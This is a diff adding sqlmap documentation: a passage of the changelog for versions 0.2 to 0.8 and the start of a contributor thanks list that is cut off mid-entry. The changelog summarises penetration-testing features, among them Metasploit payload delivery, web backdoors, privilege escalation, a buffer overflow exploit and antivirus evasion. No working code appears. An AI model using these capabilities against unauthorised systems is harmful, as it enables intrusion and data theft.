Support to parse `-C` (column name(s)) when fetching columns of a table with `--columns`: it will enumerate only columns like the provided one(s) within the specified table. +* Support for takeover features on PostgreSQL 8.4. +* Enhanced `--priv-esc` to rely on new Metasploit Meterpreter's 'getsystem' command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows. +* Automatic support in `--os-pwn` to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root. +* Fixed web backdoor functionality for `--os-cmd`, `--os-shell` and `--os-pwn` useful when web application does not support stacked queries. +* Added support to properly read (`--read-file`) also binary files via PostgreSQL by injecting sqlmap new `sys_fileread()` user-defined function. +* Updated active fingerprint and comment injection fingerprint for MySQL 5.1, MySQL 5.4 and MySQL 5.5. +* Updated active fingerprint for PostgreSQL 8.4. +* Support for NTLM authentication via python-ntlm third party library, http://code.google.com/p/python-ntlm/, `--auth-type NTLM`. +* Support to automatically decode `deflate`, `gzip` and `x-gzip` HTTP responses. +* Support for Certificate authentication, `--auth-cert` option added. +* Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (`-l`), `--scope`. +* Added option `-r` to load a single HTTP request from a text file. +* Added switch `--ignore-proxy` to ignore the system default HTTP proxy. +* Added support to ignore Set-Cookie in HTTP responses, `--drop-set-cookie`. +* Added support to specify which Google dork result page to parse, `--gpage` to be used together with `-g`. +* Major bug fix and enhancements to the multi-threading (`--threads`) functionality. +* Fixed URL encoding/decoding of GET/POST parameters and Cookie header. +* Refactored `--update` to use `python-svn` third party library if available or `svn` command to update sqlmap to the latest development version from subversion repository. +* Major bugs fixed. +* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack. +* Major code cleanup. +* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware. +* Updated user's manual. +* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from https://sqlmap.org/demo.html. + +# Version 0.8 release candidate (2009-09-21) + +* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection. +* Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. +* Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. +* Added options for MySQL and PostgreSQL to inject custom user-defined functions. +* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output. +* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified. +* Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. +* Minor bugs fixed. +* Major code refactoring. + +# Version 0.7 (2009-07-25) + +* Adapted Metasploit wrapping functions to work with latest 3.3 development version too. +* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too. +* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too. +* Minor improvement so that sqlmap tests also all parameters with no value (eg. par=). +* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+. +* Major bug fix to sql-query/sql-shell features. +* Major bug fix in `--read-file` option. +* Major silent bug fix to multi-threading functionality. +* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided. +* Fixed MySQL 'comment injection' version fingerprint. +* Fixed basic Microsoft SQL Server 2000 fingerprint. +* Many minor bug fixes and code refactoring. + +# Version 0.7 release candidate (2009-04-22) + +* Added support to execute arbitrary commands on the database server underlying operating system either returning the standard output or not via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored procedure on Microsoft SQL Server; +* Added support for out-of-band connection between the attacker box and the database server underlying operating system via stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux; +* Added support for out-of-band connection via Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support; +* Added support for out-of-band connection via SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit; +* Added support to read and write (upload) both text and binary files on the database server underlying file system for MySQL, PostgreSQL and Microsoft SQL Server; +* Added database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable; +* Speed up the inference algorithm by providing the minimum required charset for the query output; +* Major bug fix in the comparison algorithm to correctly handle also the case that the url is stable and the False response changes the page content very little; +* Many minor bug fixes, minor enhancements and layout adjustments. + +# Version 0.6.4 (2009-02-03) + +* Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object; +* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology; +* Major speed increase in DBMS basic fingerprint; +* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator; +* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing; +* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment; +* Minor layout adjustment to the `--update` output; +* Increased default timeout to 30 seconds; +* Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle; +* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable; +* Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server; +* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided; +* Updated documentation. + +# Version 0.6.3 (2008-12-18) + +* Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l ; +* Major enhancement to support Partial UNION query SQL injection technique too; +* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality; +* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`; +* Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers; +* Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided; +* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher; +* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`; +* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user; +* Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle; +* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content; +* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set; +* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords; +* Minor improvements to sqlmap Debian package files; +* Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations; +* Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url; +* Major bug fix to correctly enumerate columns on Microsoft SQL Server; +* Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified; +* Minor bug fix to correctly dump table entries when the column is provided; +* Minor bug fix to correctly handle session.error, session.timeout and httplib.BadStatusLine exceptions in HTTP requests; +* Minor bug fix to correctly catch connection exceptions and notify to the user also if they occur within a thread; +* Increased default output level from 0 to 1; +* Updated documentation. + +# Version 0.6.2 (2008-11-02) + +* Major bug fix to correctly dump tables entries when `--stop` is not specified; +* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0; +* Major bug fix when the request is POST to also send the GET parameters if any have been provided; +* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`; +* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file; +* Minor bug fix in MySQL comment injection fingerprint technique; +* Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database; +* Minor improvement to be able to dump entries on MySQL < 5.0 when database name, table name and column(s) are provided; +* Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3; +* More user-friendly warning messages. + +# Version 0.6.1 (2008-08-20) + +* Major bug fix to blind SQL injection bisection algorithm to handle an exception; +* Added a Metasploit Framework 3 auxiliary module to run sqlmap; +* Implemented possibility to test for and inject also on LIKE statements; +* Implemented `--start` and `--stop` options to set the first and the last table entry to dump; +* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool; +* Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes; +* Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore; +* Minor bug fix to correctly handle parameters' value with `%` character. + +# Version 0.6 (2008-09-01) + +* Complete code refactor and many bugs fixed; +* Added multithreading support to set the maximum number of concurrent HTTP requests; +* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack; +* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator; +* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file; +* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option; +* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages; +* Created sqlmap .exe (Windows) portable executable; +* Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times; +* Improved automatic check for parenthesis when testing and forging SQL query vector; +* Now it checks for SQL injection on all GET/POST/Cookie parameters then it lets the user select which parameter to perform the injection on in case that more than one is injectable; +* Implemented support for HTTPS requests over HTTP(S) proxy; +* Added a check to handle NULL or not available queries output; +* More entropy (randomStr() and randomInt() functions in lib/core/common.py) in inband SQL injection concatenated query and in AND condition checks; +* Improved XML files structure; +* Implemented the possibility to change the HTTP Referer header; +* Added support to resume from session file also when running with inband SQL injection attack; +* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root; +* Added a check to assure that the provided string to match (`--string`) is within the page content; +* Fixed various queries in XML file; +* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it; +* Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function; +* Major bug fixed to avoid tracebacks when the testable parameter(s) is dynamic, but not injectable; +* Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic; +* Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires; +* Added support to inject also on Set-Cookie parameters; +* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`; +* Renamed some command line options; +* Added a conversion library; +* Added code schema and reminders for future developments; +* Added Copyright comment and $Id$; +* Updated the command line layout and help messages; +* Updated some docstrings; +* Updated documentation files. + +# Version 0.5 (2007-11-04) + +* Added support for Oracle database management system +* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins; +* Added support to extract database users password hash on Microsoft SQL Server; +* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting; +* Added support for SQL injection on HTTP Cookie and User-Agent headers; +* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind(); +* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack; +* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables; +* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`); +* Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default; +* Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml; +* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped; +* Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py; +* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`); +* Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces; +* More minor layout enhancements in some libraries; +* Renamed DMBS plugins; +* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements; +* Updated all documentation files. + +# Version 0.4 (2007-06-15) + +* Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS; +* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS; +* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`); +* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`); +* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ; +* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; +* Improved logging functionality: passed from banal 'print' to Python native logging library; +* Added support for more than one parameter in `-p` command line option; +* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`); +* Added the command line option `--remote-dbms` to manually specify the remote DBMS; +* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements; +* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`); +* Added support to specify the database table column to enumerate (`-C COL`); +* Added inband SQL injection (UNION query) support (`--union-use`); +* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements; +* Reviewed the directory tree structure; +* Split lib/common.py: inband injection functionalities now are moved to lib/union.py; +* Updated documentation files. + +# Version 0.3 (2007-01-20) + +* Added module for MS SQL Server; +* Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check; +* Added PostgreSQL dbms active fingerprint; +* Added support for string match (`--string`); +* Added support for UNION check (`--union-check`); +* Removed duplicated code, delegated most of features to the engine in common.py and option.py; +* Added support for `--data` command line argument to pass the string for POST requests; +* Added encodeParams() method to encode url parameters before making http request; +* Many bug fixes; +* Rewritten documentation files; +* Complete code restyling. + +# Version 0.2 (2006-12-13) + +* complete refactor of entire program; +* added TODO and THANKS files; +* added some papers references in README file; +* moved headers to user-agents.txt, now -f parameter specifies a file (user-agents.txt) and randomize the selection of User-Agent header; +* strongly improved program plugins (mysqlmap.py and postgres.py), major enhancements: * improved active mysql fingerprint check_dbms(); * improved enumeration functions for both databases; * minor changes in the unescape() functions; +* replaced old inference algorithm with a new bisection algorithm. +* reviewed command line parameters, now with -p it's possible to specify the parameter you know it's vulnerable to sql injection, this way the script won't perform the sql injection checks itself; removed the TOKEN parameter; +* improved Common class, adding support for http proxy and http post method in hash_page; +* added OptionCheck class in option.py which performs all needed checks on command line parameters and values; +* added InjectionCheck class in injection.py which performs check on url stability, dynamics of parameters and injection on dynamic url parameters; +* improved output methods in dump.py; +* layout enhancement on main program file (sqlmap.py), adapted to call new option/injection classes and improvements on catching of exceptions. diff --git a/src/sqlmap-master/doc/THANKS.md b/src/sqlmap-master/doc/THANKS.md new file mode 100644 index 0000000..3d5e9ec --- /dev/null +++ b/src/sqlmap-master/doc/THANKS.md @@ -0,0 +1,819 @@ +# Individuals + +Andres Tarasco Acuna, +* for suggesting a feature + +Santiago Accurso, +* for reporting a bug + +Syed Afzal, +* for contributing a WAF script varnish.py + +Zaki Akhmad, +* for suggesting a couple of features + +Olu Akindeinde, +* for reporting a couple of bugs + +David Alvarez, +* for reporting a bug + +Sergio Alves, +* for reporting a bug + +Thomas Anderson, +* for reporting a bug + +Chip Andrews, +* for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site + +Smith Andy, +* for suggesting a feature + +Otavio Augusto, +* for reporting a minor bug + +Simon Baker, +* for reporting some bugs + +Ryan Barnett, +* for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html + +Emiliano Bazaes, +* for reporting a minor bug + +Daniele Bellucci, +* for starting sqlmap project and developing it between July and August 2006 + +Sebastian Bittig, and the rest of the team at r-tec IT Systeme GmbH +* for contributing the DB2 support initial patch: fingerprint and enumeration + +Anthony Boynes, +* for reporting several bugs + +Marcelo Toscani Brandao +* for reporting a bug + +Velky Brat, +* for suggesting a minor enhancement to the bisection algorithm + +James Briggs, +* for suggesting a minor enhancement + +Gianluca Brindisi, +* for reporting a couple of bugs + +Jack Butler, +* for contributing the sqlmap site favicon + +Ulisses Castro, +* for reporting a bug + +Roberto Castrogiovanni, +* for reporting a minor bug + +Cesar Cerrudo, +* for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf + +Karl Chen, +* for contributing the initial multi-threading patch for the inference algorithm + +Y P Chien, +* for reporting a minor bug + +Pierre Chifflier, and Mark Hymers, +* for uploading and accepting the sqlmap Debian package to the official Debian project repository + +Hysia Chow +* for contributing a couple of WAF scripts + +Chris Clements, +* for reporting a couple of bugs + +John Cobb, +* for reporting a minor bug + +Andreas Constantinides, +* for reporting a minor bug + +Andre Costa, +* for reporting a minor bug +* for suggesting a minor enhancement + +Ulises U. Cune, +* for reporting a bug + +Alessandro Curio, +* for reporting a minor bug + +Alessio Dalla Piazza, +* for reporting a couple of bugs + +Alexis Danizan, +* for contributing support for ClickHouse + +Sherif El-Deeb, +* for reporting a minor bug + +Thomas Etrillard, +* for contributing the IBM DB2 error-based payloads (RAISE_ERROR) + +Stefano Di Paola, +* for suggesting good features + +Mosk Dmitri, +* for reporting a minor bug + +Meng Dong, +* for contributing a code for Waffit integration + +Carey Evans, +* for his fcrypt module that allows crypt(3) support + on Windows platforms + +Shawn Evans, +* for suggesting an idea for one tamper script, greatest.py + +Adam Faheem, +* for reporting a few bugs + +James Fisher, +* for contributing two very good feature requests +* for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster + +Jim Forster, +* for reporting a bug + +Rong-En Fan, +* for committing the sqlmap 0.5 port to the official FreeBSD project repository + +Giorgio Fedon, +* for suggesting a speed improvement for bisection algorithm +* for reporting a bug when running against Microsoft SQL Server 2005 + +Kasper Fons, +* for reporting several bugs + +Alan Franzoni, +* for helping out with Python subprocess library + +Harold Fry, +* for suggesting a minor enhancement + +Daniel G. Gamonal, +* for reporting a minor bug + +Marcos Mateos Garcia, +* for reporting a minor bug + +Andrew Gecse, +* for reporting a minor issue + +Ivan Giacomelli, +* for reporting a bug +* for suggesting a minor enhancement +* for reviewing the documentation + +Dimitris Giannitsaros, +* for contributing a REST-JSON API client + +Nico Golde, +* for reporting a couple of bugs + +Oliver Gruskovnjak, +* for reporting a bug +* for contributing a minor patch + +Davide Guerri, +* for suggesting an enhancement + +Dan Guido, +* for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/ + +David Guimaraes, +* for reporting considerable amount of bugs +* for suggesting several features + +Chris Hall, +* for coding the prettyprint.py library + +Tate Hansen, +* for donating to sqlmap development + +Mario Heiderich, +Christian Matthies, +Lars H. Strojny, +* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, https://github.com/PHPIDS/PHPIDS + +Kristian Erik Hermansen, +* for reporting a bug +* for donating to sqlmap development + +Alexander Hagenah, +* for reporting a minor bug + +Dennis Hecken, +* for reporting a minor bug + +Choi Ho, +* for reporting a minor bug + +Jorge Hoya, +* for suggesting a minor enhancement + +Will Holcomb, +* for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code + +Daniel Huckmann, +* for reporting a couple of bugs + +Daliev Ilya, +* for reporting a bug + +Mehmet İnce, +* for contributing a tamper script xforwardedfor.py + +Jovon Itwaru, +* for reporting a minor bug + +Prashant Jadhav, +* for reporting a bug + +Dirk Jagdmann, +* for reporting a typo in the documentation + +Luke Jahnke, +* for reporting a bug when running against MySQL < 5.0 + +Andrew Kitis +* for contributing a tamper script lowercase.py + +David Klein, +* for reporting a minor code improvement + +Sven Klemm, +* for reporting two minor bugs with PostgreSQL + +Anant Kochhar, +* for providing with feedback on the user's manual + +Dmitriy Kononov, +* for reporting a minor bug + +Alexander Kornbrust, +* for reporting a couple of bugs + +Krzysztof Kotowicz, +* for reporting a minor bug + +Nicolas Krassas, +* for reporting a couple of bugs + +Oliver Kuckertz, +* for contributing a minor patch + +Alex Landa, +* for contributing a patch adding beta support for XML output + +Guido Landi, +* for reporting a couple of bugs +* for the great technical discussions +* for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development +* for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009 + +Lee Lawson, +* for reporting a minor bug + +John J. Lee, and others +* for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified + +Nico Leidecker, +* for providing with feedback on a few features +* for reporting a couple of bugs +* for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip + +Gabriel Lima, +* for reporting a couple of bugs + +Svyatoslav Lisin, +* for suggesting a minor feature + +Miguel Lopes, +* for reporting a minor bug + +Truong Duc Luong, +* for reporting a minor bug + +Pavol Luptak, +* for reporting a bug when injecting on a POST data parameter + +Till Maas, +* for suggesting a minor feature + +Michael Majchrowicz, +* for extensively beta-testing sqlmap on various MySQL DBMS +* for providing really appreciated feedback +* for suggesting a lot of ideas and features + +Vinícius Henrique Marangoni, +* for contributing a Portuguese translation of README.md + +Francesco Marano, +* for contributing the Microsoft SQL Server/Sybase error-based - Stacking (EXEC) payload + +Ahmad Maulana, +* for contributing a tamper script halfversionedmorekeywords.py + +Ferruh Mavituna, +* for exchanging ideas on the implementation of a couple of features + +David McNab, +* for his XMLObject module that allows XML files to be operated on like Python objects + +Spencer J. McIntyre, +* for reporting a minor bug +* for contributing a patch for OS fingerprinting on DB2 + +Brad Merrell, +* for reporting a minor bug + +Michael Meyer, +* for suggesting a minor feature + +Enrico Milanese, +* for reporting a minor bug +* for sharing some ideas for the PHP backdoor + +Liran Mimoni, +* for reporting a minor bug + +Marco Mirandola, +* for reporting a minor bug + +Devon Mitchell, +* for reporting a minor bug + +Anton Mogilin, +* for reporting a few bugs + +Sergio Molina, +* for reporting a minor bug + +Anastasios Monachos, +* for providing some useful data +* for suggesting a feature +* for reporting a couple of bugs + +Kirill Morozov, +* for reporting a bug +* for suggesting a feature + +Alejo Murillo Moya, +* for reporting a minor bug +* for suggesting a few features + +Yonny Mutai, +* for reporting a minor bug + +Roberto Nemirovsky, +* for pointing out some enhancements + +Sebastian Nerz, +* for reporting a (potential) vulnerability in --eval + +Simone Onofri, +* for patching the PHP web backdoor to make it work properly also on Windows + +Michele Orru, +* for reporting a couple of bug +* for suggesting ideas on how to implement the RESTful API + +Shaohua Pan, +* for reporting several bugs +* for suggesting a few features + +Antonio Parata, +* for sharing some ideas for the PHP backdoor + +Adrian Pastor, +* for donating to sqlmap development + +Christopher Patten, +* for reporting a bug in the blind SQL injection bisection algorithm + +Zack Payton, +* for reporting a minor bug + +Jaime Penalba, +* for contributing a patch for INSERT/UPDATE generic boundaries + +Pedrito Perez, <0ark1ang3l(at)gmail.com> +* for reporting a couple of bugs + +Brandon Perry, +* for reporting a couple of bugs + +Travis Phillips, +* for suggesting a minor enhancement + +Mark Pilgrim, +* for porting chardet package (Universal Encoding Detector) to Python + +Steve Pinkham, +* for suggesting a feature +* for contributing a new SQL injection vector (MSSQL time-based blind) +* for donating to sqlmap development + +Adam Pridgen, +* for suggesting some features + +Luka Pusic, +* for reporting a couple of bugs + +Ole Rasmussen, +* for reporting a bug +* for suggesting a feature + +Alberto Revelli, +* for inspiring to write sqlmap user's manual in SGML +* for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net + +David Rhoades, +* for reporting a bug + +Andres Riancho, +* for beta-testing sqlmap +* for reporting a bug and suggesting some features +* for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net +* for suggesting a way for handling DNS caching + +Jamie Riden, +* for reporting a minor bug + +Alexander Rigbo, +* for contributing a minor patch + +Antonio Riva, +* for reporting a bug when running with python 2.5 + +Ethan Robish, +* for reporting a bug + +Levente Rog, +* for reporting a minor bug + +Andrea Rossi, +* for reporting a minor bug +* for suggesting a feature + +Frederic Roy, +* for reporting a couple of bugs + +Vladimir Rutsky, +* for suggesting a couple of minor enhancements + +Richard Safran, +* for donating the sqlmap.org domain + +Tomoyuki Sakurai, +* for submitting to the FreeBSD project the sqlmap 0.5 port + +Roberto Salgado, +* for contributing considerable amount of tamper scripts + +Pedro Jacques Santos Santiago, +* for reporting considerable amount of bugs + +Marek Sarvas, +* for reporting several bugs + +Philippe A. R. Schaeffer, +* for reporting a minor bug + +Henri Salo +* for a donation + +Mohd Zamiri Sanin, +* for reporting a minor bug + +Jorge Santos, +* for reporting a minor bug + +Sven Schluter, +* for contributing a patch +* for waiting a number of seconds between each HTTP request + +Ryan Sears, +* for suggesting a couple of enhancements +* for donating to sqlmap development + +Uemit Seren, +* for reporting a minor adjustment when running with python 2.6 + +Shane Sewell, +* for suggesting a feature + +Ahmed Shawky, +* for reporting a major bug with improper handling of parameter values +* for reporting a bug + +Brian Shura, +* for reporting a bug + +Sumit Siddharth, +* for sharing ideas on the implementation of a couple of features + +Andre Silva, +* for reporting a bug + +Benjamin Silva H. +* for reporting a bug + +Duarte Silva +* for reporting a couple of bugs + +M Simkin, +* for suggesting a feature + +Konrads Smelkovs, +* for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server + +Chris Spencer, +* for reviewing the user's manual grammar + +Michael D. Stenner, +* for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections + +Marek Stiefenhofer, +* for reporting a few bugs + +Jason Swan, +* for reporting a bug when enumerating columns on Microsoft SQL Server +* for suggesting a couple of improvements + +Chilik Tamir, +* for contributing a patch for initial support SOAP requests + +Alessandro Tanasi, +* for extensively beta-testing sqlmap +* for suggesting many features and reporting some bugs +* for reviewing the documentation + +Andres Tarasco, +* for contributing good feedback + +Tom Thumb, +* for reporting a major bug + +Kazim Bugra Tombul, +* for reporting a minor bug + +Efrain Torres, +* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for committing it on the Metasploit official subversion repository +* for his great Metasploit WMAP Framework + +Jennifer Torres, +* for contributing a tamper script luanginx.py + +Sandro Tosi, +* for helping to create sqlmap Debian package correctly + +Jacco van Tuijl, +* for reporting several bugs + +Vitaly Turenko, +* for reporting a bug + +Augusto Urbieta, +* for reporting a minor bug + +Bedirhan Urgun, +* for reporting a few bugs +* for suggesting some features and improvements +* for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench + +Kyprianos Vasilopoulos, +* for reporting a couple of minor bugs + +Vlado Velichkovski, +* for reporting considerable amount of bugs +* for suggesting an enhancement + +Johnny Venter, +* for reporting a couple of bugs + +Carlos Gabriel Vergara, +* for suggesting couple of good features + +Patrick Webster, +* for suggesting an enhancement +* for donating to sqlmap development (from OSI.Security) + +Ed Williams, +* for suggesting a minor enhancement + +Anthony Zboralski, +* for providing with detailed feedback +* for reporting a few minor bugs +* for donating to sqlmap development + +Thierry Zoller, +* for reporting a couple of major bugs + +Zhen Zhou, +* for suggesting a feature + +-insane-, +* for reporting a minor bug + +1ndr4 joe, +* for reporting a couple of bugs + +abc abc, +* for reporting a minor bug + +Abuse 007, +* for reporting a bug + +agix, +* for contributing the file upload via certutil.exe functionality + +Alex, +* for reporting a minor bug + +anonymous anonymous, +* for reporting a couple of bugs + +bamboo, +* for reporting a couple of bugs + +Brandon E., +* for reporting a bug + +black zero, +* for reporting a minor bug + +blueBoy, +* for reporting a bug + +buawig, +* for reporting considerable amount of bugs + +Bugtrace, +* for reporting several bugs + +cats, +* for reporting a couple of bugs + +Christian S, +* for reporting a minor bug + +clav, +* for reporting a minor bug + +dragoun dash, +* for reporting a minor bug + +flsf, +* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py +* for contributing a minor patch + +fufuh, +* for reporting a bug when running on Windows + +Hans Wurst, +* for reporting a couple of bugs + +Hysia, +* for contributing a Chinese translation of README.md + +james, +* for reporting a bug + +Joe "Pragmatk", +* for reporting a few bugs + +John Smith, +* for reporting several bugs +* for suggesting some features + +m4l1c3, +* for reporting considerable amount of bugs + +mariano, +* for reporting a bug + +mitchell, +* for reporting a few bugs + +Nadzree, +* for reporting a minor bug + +nightman, +* for reporting considerable amount of bugs + +Oso Dog osodog123(at)yahoo.com +* for reporting a minor bug + +pacman730, +* for reporting a bug + +pentestmonkey, +* for reporting several bugs +* for suggesting a few minor enhancements + +Phat R., +* for reporting a few bugs + +Phil P, <(at)superevr> +* for 